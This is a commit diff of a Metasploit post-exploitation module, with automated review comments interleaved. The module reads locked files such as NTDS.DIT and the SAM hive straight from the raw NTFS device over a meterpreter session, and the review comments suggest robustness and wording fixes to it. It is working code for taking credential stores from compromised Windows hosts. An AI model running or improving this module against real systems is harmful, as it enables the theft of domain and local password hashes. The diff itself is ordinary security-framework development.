Small tidyup
parent
970c5d115a
commit
358ab2590e
|
@ -236,7 +236,7 @@ module Rex
|
||||||
def file(path)
|
def file(path)
|
||||||
repertory = mft_record_from_mft_num(5)
|
repertory = mft_record_from_mft_num(5)
|
||||||
index_entry = {}
|
index_entry = {}
|
||||||
for r in path.split('\\')
|
path.split('\\').each do |r|
|
||||||
attributes = mft_record_attribute(repertory)
|
attributes = mft_record_attribute(repertory)
|
||||||
index = index_list_from_attributes(attributes)
|
index = index_list_from_attributes(attributes)
|
||||||
unless index.key?(r)
|
unless index.key?(r)
|
||||||
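Review bot: Switching from `for r in path.split('\\')` to `path.split('\\').each do |r|` changes the scope of `r` — with `for` it leaked into the enclosing method, with `each` it is block-local — so any use of `r` after the loop in the rest of `file`, which lies outside this hunk, would now raise NameError; please confirm none exists. Separately, `unless index.key?(r)` is an exact-match hash lookup, while NTFS path components are case-insensitive; if the keys produced by `index_list_from_attributes` are the on-disk names, a caller passing `windows\system32\config\SAM` would fail where Windows itself would succeed, and a comment such as `# NOTE: lookup is case-sensitive; callers must match on-disk casing` (or a case-folded lookup) would make that explicit. Empty components from a doubled or trailing backslash also arrive here as `""` and will fall into the same `unless` branch.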
|
|
|
@ -3,26 +3,27 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
require 'rex/parser/fs/ntfs'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
class Metasploit3 < Msf::Post
|
||||||
include Msf::Post::Windows::Priv
|
include Msf::Post::Windows::Priv
|
||||||
require "rex/parser/fs/ntfs"
|
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Windows File Gathering In Raw NTFS',
|
'Name' => 'Windows File Gathering In Raw NTFS',
|
||||||
'Description' => %q{
|
'Description' => %q(
|
||||||
This module gather file using the raw NTFS device, bypassing some Windows restriction.
|
This module gather file using the raw NTFS device, bypassing some Windows restriction.
|
||||||
Gather file from disk bypassing restriction like already open file with write right lock.
|
Gather file from disk bypassing restriction like already open file with write right lock.
|
||||||
Can be used to retreive file like NTDS.DIT
|
Can be used to retreive file like NTDS.DIT),
|
||||||
},
|
|
||||||
'License' => 'MSF_LICENSE',
|
'License' => 'MSF_LICENSE',
|
||||||
'Platform' => ['win'],
|
'Platform' => ['win'],
|
||||||
'SessionTypes' => ['meterpreter'],
|
'SessionTypes' => ['meterpreter'],
|
||||||
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], #@danilbaz
|
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], # @danilbaz
|
||||||
'References' => [
|
'References' => [
|
||||||
[ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
|
[ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
|
||||||
]
|
]
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
|
OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
|
||||||
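Review bot: The description and option help still carry the typo "retreive" — it appears in the last line of the `%q(...)` block and in the `OptString.new('FILE_PATH', ...)` help string — and since this commit already touches the description delimiters it is the natural place to fix both, e.g. `Can be used to retrieve files like NTDS.DIT` and `'The FILE_PATH to retrieve from the Volume raw device'`. It would also help operators to state the prerequisite in the description: `run` (in a later hunk of this commit) fails with NoAccess unless `is_admin?`, and the raw-device read needs an absolute `X:\` path, so a line such as `Requires administrative privileges; FILE_PATH must be an absolute local path (e.g. C:\Windows\System32\config\SAM).` belongs in the description. The `%q{` to `%q(` change is otherwise fine as the text contains no parentheses.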
|
@ -32,46 +33,46 @@ class Metasploit3 < Msf::Post
|
||||||
def run
|
def run
|
||||||
winver = sysinfo["OS"]
|
winver = sysinfo["OS"]
|
||||||
|
|
||||||
if winver =~ /2000/i
|
fail_with(Exploit::Failure::NoTarget, 'Module not valid for Windows 2000') if winver =~ /2000/
|
||||||
print_error("Module not valid for Windows 2000")
|
fail_with(Exploit::Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
unless is_admin?
|
|
||||||
print_error("You don't have enough privileges")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
file_path = datastore['FILE_PATH']
|
file_path = datastore['FILE_PATH']
|
||||||
|
|
||||||
r = client.railgun.kernel32.GetFileAttributesA(file_path)
|
r = client.railgun.kernel32.GetFileAttributesA(file_path)
|
||||||
|
|
||||||
if r['GetLastError'] != 0
|
if r['GetLastError'] != 0
|
||||||
print_error("The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts")
|
fail_with(
|
||||||
return nil
|
Exploit::Failure::BadConfig,
|
||||||
|
'The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
drive = file_path[0, 2]
|
drive = file_path[0, 2]
|
||||||
|
|
||||||
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE",
|
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}",
|
||||||
nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
|
'GENERIC_READ',
|
||||||
|
'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
|
||||||
|
nil,
|
||||||
|
'OPEN_EXISTING',
|
||||||
|
'FILE_FLAG_WRITE_THROUGH',
|
||||||
|
0)
|
||||||
|
|
||||||
if r['GetLastError'] != 0
|
if r['GetLastError'] != 0
|
||||||
print_error("Error opening #{drive} GetLastError=#{r['ErrorMessage']}")
|
fail_with(
|
||||||
return nil
|
Exploit::Failure::Unknown,
|
||||||
|
"Error opening #{drive}. Windows Error Code: #{r['GetLastError']} - #{r['ErrorMessage']}")
|
||||||
end
|
end
|
||||||
|
|
||||||
@handle = r['return']
|
@handle = r['return']
|
||||||
print_status("Successfuly opened #{drive}")
|
print_status("Successfuly opened #{drive}")
|
||||||
begin
|
begin
|
||||||
fs = Rex::Parser::NTFS.new(self)
|
fs = Rex::Parser::NTFS.new(self)
|
||||||
print_status("Trying gather #{file_path}")
|
print_status("Trying to gather #{file_path}")
|
||||||
path = file_path[3, file_path.length - 3]
|
path = file_path[3, file_path.length - 3]
|
||||||
data = fs.file(path)
|
data = fs.file(path)
|
||||||
file_name = file_path.split("\\")[-1]
|
file_name = file_path.split("\\")[-1]
|
||||||
stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file")
|
stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file")
|
||||||
print_good("Saving file : #{stored_path}")
|
print_good("Saving file : #{stored_path}")
|
||||||
rescue ::Exception => e
|
|
||||||
print_error("Post failed : #{e.backtrace}")
|
|
||||||
ensure
|
ensure
|
||||||
client.railgun.kernel32.CloseHandle(@handle)
|
client.railgun.kernel32.CloseHandle(@handle)
|
||||||
end
|
end
|
||||||
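Review bot: The new BadConfig message tells the operator to use the `C:\\Windows\\...` form, but nothing enforces it: `GetFileAttributesA` also succeeds for a relative path or a UNC path, after which `drive = file_path[0, 2]` and `path = file_path[3, file_path.length - 3]` slice garbage and the module fails later with a less helpful error from `CreateFileA` or `fs.file`. Add an explicit shape check before the attribute lookup, e.g. `fail_with(Exploit::Failure::BadConfig, 'FILE_PATH must be an absolute local path such as C:\\Windows\\System32\\drivers\\etc\\hosts') unless file_path =~ /\A[a-z]:\\/i`. The new `fail_with(Exploit::Failure::Unknown, ...)` after `CreateFileA` still keys on `GetLastError != 0` rather than the returned handle; the documented failure signal for CreateFile is a return of INVALID_HANDLE_VALUE, so checking `r['return']` against that (0xFFFFFFFF under railgun, if I read its convention correctly) would be the more reliable guard. With the blanket `rescue ::Exception` removed, exceptions from `fs.file` now propagate as module failures while `ensure` still closes the handle, which looks correct; the `end` of `run` itself is outside this hunk.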
|
|